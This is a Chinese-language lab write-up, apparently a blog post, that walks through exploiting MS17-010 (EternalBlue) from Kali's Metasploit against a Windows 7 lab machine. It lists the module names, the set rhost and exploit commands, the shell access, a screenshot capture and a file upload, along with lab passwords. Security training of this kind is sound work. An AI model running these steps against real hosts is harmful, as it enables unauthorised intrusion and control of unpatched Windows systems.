模拟“永恒之蓝”攻击,实现系统提权

实验目的:

使用Kali Linux平台的“metasploit framework”工具,针对Windows7操作系统模拟“永恒之蓝”攻击,实现系统提权。

实验环境:

系统: kali  Windows7

kali用户名:kali                                密码:kali

Windows7用户名:小王                   密码:123456

实验步骤:

1.检测靶机的445端口。

 2.在kali中观测靶机的开放端口及版本

3.启动“metasploit framework”平台

 

 4.执行“search ms17-010”命令,查看可以利用的攻击模块

 5.使用“use auxiliary/scanner/smb/smb_ms17_010”加载扫描模块

 6.执行”show options”查看配置选项

 7.再次执行“search ms17-010”命令查询可利用模块

 8.执行加载“use exploit/windows/smb/ms17_010_eternalblue”模块

 9.执行“set rhost 192.168.98.130”命令,设置远程目标主机地址。

 10.执行“exploit”命令攻击

11.执行shell切换到靶机下 

 12.发现乱码执行chcp 65001将乱码转化

 13.执行exit推出靶机执行screenshot捕捉靶机屏幕并查看图片

 

 14.在kali下新建一个文档txt 传输到靶机下

 

 15.文件成功传输到靶机下

  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值